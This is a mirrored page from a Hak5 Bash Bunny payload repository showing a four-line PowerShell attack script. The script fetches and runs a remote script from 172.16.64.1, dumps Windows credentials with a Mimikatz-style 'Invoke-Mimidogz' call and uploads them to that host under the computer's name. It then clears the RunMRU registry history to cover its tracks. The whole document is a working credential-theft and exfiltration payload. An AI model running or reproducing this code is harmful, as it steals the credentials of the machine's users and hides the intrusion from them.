mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
4 lines
399 B
PowerShell
4 lines
399 B
PowerShell
IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');$o = Invoke-Mimidogz -DumpCred
|
|
(New-Object Net.WebClient).UploadString('http://172.16.64.1/'+$env:computername, $o)
|
|
(New-Object Net.WebClient).UploadString('http://172.16.64.1/EOF', 'EOF');
|
|
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue |